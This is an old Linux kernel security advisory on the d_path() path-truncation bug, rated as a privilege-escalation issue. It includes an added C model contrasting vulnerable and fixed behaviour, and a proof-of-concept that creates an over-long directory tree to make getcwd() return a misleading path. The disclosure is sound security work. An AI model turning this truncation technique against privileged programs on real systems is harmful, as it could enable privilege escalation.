Linux Kernel d_path() Path Truncation Vulnerability
Published: 2002-03-29
Updated: 2002-03-29
Severity: High
Threat type: privilege escalation
Error type: exceptional condition handling error
Exploitation: server mode
BUGTRAQ ID: 4367
Affected systems:
Linux kernel 2.2
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
Linux kernel 2.2.14
+ Caldera eDesktop 2.4
+ Caldera eServer 2.3.1
+ RedHat Linux 6.2
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
+ RedHat Linux 7.0
Linux kernel 2.2.17
+ MandrakeSoft Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.18
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0-Beta
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.20
Linux kernel 2.3
Linux kernel 2.3.99
Linux kernel 2.4
Linux kernel 2.4.1
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
Linux kernel 2.4.3
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
Linux kernel 2.4.4
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.6
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.8
+ MandrakeSoft Linux Mandrake 8.1
Linux kernel 2.4.9
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 ia64
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
Linux kernel 2.4.17
Linux kernel 2.4.18
Detailed description
The Linux kernel's d_path() function converts a directory entry (dentry) structure into an ASCII pathname, returning the path of the given dentry in a fixed buffer of PAGE_SIZE bytes. The buffer is filled from its end, one component at a time, walking from the dentry towards the root.
If the path of the supplied dentry is too long, exceeding PAGE_SIZE - 1 characters, d_path() stops when the buffer is exhausted and returns the incomplete result without reporting an error. Because components are prepended from the end of the buffer, it is the leading components that are dropped, and the returned string still begins with '/'. Callers such as getcwd(2) and the /proc/<pid>/cwd, root and exe symlinks therefore receive what looks like a well-formed absolute path, but one that names a different location than the real one; a privileged program that trusts such a path can be misled.
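The following user-space model, added here as an illustration and not part of the original advisory or of the kernel source, reproduces the shape of the prepend-from-the-end loop described above so the truncation can be observed with a deliberately tiny buffer. The function and sample names (model_d_path, truncated_path, checked_path, the /tmp/123456789abc/etc/passwd path) are assumptions chosen for the demonstration; the hardened variant shows the behaviour a fixed kernel should have, namely reporting ENAMETOOLONG instead of returning a partial path.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * User-space model of the prepend-from-the-end loop used by the 2.2/2.4
 * __d_path(): components arrive leaf first (as the kernel walks
 * dentry->d_parent) and are copied into the tail of a fixed buffer.
 * Returns a pointer into buf; on success *err is 0.
 *
 * checked == 0 reproduces the vulnerable behaviour: when the buffer runs
 * out the loop simply stops, leaving a string that still begins with '/'
 * and therefore looks like a complete absolute path.
 * checked != 0 is the hardened variant: the overflow is reported as
 * ENAMETOOLONG and no partial path is handed back.
 */
static const char *model_d_path(const char *const *leaf_to_root, size_t n,
                                char *buf, int buflen, int checked, int *err)
{
    char *end = buf + buflen;
    char *retval;

    *err = 0;
    *--end = '\0';
    buflen--;

    /* The path of the root itself is "/" */
    retval = end - 1;
    *retval = '/';

    for (size_t i = 0; i < n; i++) {
        int namelen = (int)strlen(leaf_to_root[i]);

        buflen -= namelen + 1;           /* room for '/' + component */
        if (buflen < 0) {
            if (checked) {
                *err = ENAMETOOLONG;     /* fixed: fail loudly */
                return NULL;
            }
            break;                       /* vulnerable: silently truncate */
        }
        end -= namelen;
        memcpy(end, leaf_to_root[i], (size_t)namelen);
        *--end = '/';
        retval = end;
    }
    return retval;
}

/* Constructed sample: the real object is /tmp/123456789abc/etc/passwd.
 * A 16-byte buffer cannot hold it (the kernel uses PAGE_SIZE; the size is
 * shrunk here only to make the effect visible without a 4 KB path). */
static const char *const sample_leaf_to_root[] = {
    "passwd", "etc", "123456789abc", "tmp"
};
#define SAMPLE_N (sizeof sample_leaf_to_root / sizeof sample_leaf_to_root[0])

/* Vulnerable variant over the sample path; returns the misleading string. */
const char *truncated_path(char *buf, int buflen)
{
    int err;
    return model_d_path(sample_leaf_to_root, SAMPLE_N, buf, buflen, 0, &err);
}

/* Hardened variant over the sample path; NULL plus *err on overflow. */
const char *checked_path(char *buf, int buflen, int *err)
{
    return model_d_path(sample_leaf_to_root, SAMPLE_N, buf, buflen, 1, err);
}

int main(void)
{
    char small[16], big[64];
    int err;

    printf("vulnerable, 16-byte buffer: %s\n", truncated_path(small, sizeof small));
    if (checked_path(small, sizeof small, &err) == NULL)
        printf("hardened,   16-byte buffer: error %d (ENAMETOOLONG)\n", err);
    printf("either,     64-byte buffer: %s\n", checked_path(big, sizeof big, &err));
    return 0;
}
```

With the 16-byte buffer the vulnerable variant yields "/etc/passwd" for an object that actually lives under /tmp, which is exactly the kind of plausible but wrong answer a caller of getcwd(2) or a reader of /proc/<pid>/cwd would have received; the hardened variant refuses to answer, and both agree once the buffer is large enough.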
Test code

/*
 * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
 *
 * Bug found by cliph
 */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strlen() */
#include <limits.h>
#include <errno.h>
#include <paths.h>
#include <sys/stat.h>   /* mkdir() */
/*
 * Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
 * trailing '\0'
 */
#define PATH_COMPONENT "123456789abcdef"

/* Bail out on the first failed call; errno is cleared before each call. */
void err(char * msg)
{
    if (errno) {
        perror(msg);
        exit(1);
    }
}

int main()
{
    char buf[PATH_MAX + 1]; /* think of trailing '\0' */
    int len;

    errno = 0;
    chdir(_PATH_TMP);
    err("chdir");

    /* show CWD before exploiting the bug */
    getcwd(buf, sizeof(buf));
    err("getcwd #1");
    fprintf(stderr, "CWD=%.40s\n", buf);

    /* creating long directory tree - it must exceed PATH_MAX characters */
    for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
        errno = 0;
        mkdir(PATH_COMPONENT, 0700);
        if (errno != EEXIST)
            err("mkdir");
        errno = 0;
        chdir(PATH_COMPONENT);
        err("chdir");
    }

    /* show CWD after exploiting the bug: on a vulnerable kernel getcwd()
     * succeeds and returns the path with its leading components missing;
     * a fixed kernel fails here with ENAMETOOLONG instead */
    errno = 0;
    getcwd(buf, sizeof(buf));
    err("getcwd #2");
    fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);
    return 0;
}
Solution: None available at the time of publication.
Related information: Wojciech Purczynski <cliph@isec.pl>.
Reference: http://online.securityfocus.com/archive/1/264117